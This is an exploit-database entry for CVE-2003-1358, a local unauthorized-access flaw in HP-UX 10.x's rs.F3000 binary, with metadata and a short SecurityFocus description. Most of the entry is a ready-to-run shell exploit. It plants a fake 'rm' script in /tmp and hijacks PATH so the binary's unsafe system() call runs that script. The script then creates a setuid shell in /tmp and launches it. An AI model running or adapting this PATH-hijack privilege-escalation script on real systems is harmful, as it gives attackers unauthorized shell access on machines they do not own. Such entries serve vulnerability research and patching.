EXPLOITS

HP-UX 10.x - rs.F3000 Unauthorized Access

Author: Last Stage of Delirium
type: local
platform: hp-ux
port: 
date_added: 2003-02-12  
date_updated: 2012-10-25  
verified: 1  
codes: CVE-2003-1358;OSVDB-60336  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22248.sh  

source: https://www.securityfocus.com/bid/6837/info

The rs.F3000 binary is prone to an issue that may allow attackers to obtain unauthorized access to a vulnerable system. A denial of service attack is also possible. This is due to multiple instances of the system() function being used in an unsafe manner.

#!/bin/sh
## copyright LAST STAGE OF DELIRIUM may 2002 poland            *://lsd-pl.net/ #
## /usr/lib/X11/Xserver/ucode/screens/hp/rs.F3000                              #

echo "copyright LAST STAGE OF DELIRIUM may 2002 poland  //lsd-pl.net/"
echo "/usr/lib/X11/Xserver/ucode/screens/hp/rs.F3000 for HP-UX 10.20 700/800"

cat > /tmp/rm << 'EOF'
    /usr/bin/cp /bin/sh /tmp/sh
    /usr/bin/chown daemon /tmp/sh
    /usr/bin/chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/rm

PATH=/tmp:$PATH
export PATH
/usr/lib/X11/Xserver/ucode/screens/hp/rs.F3000
sleep 3
sh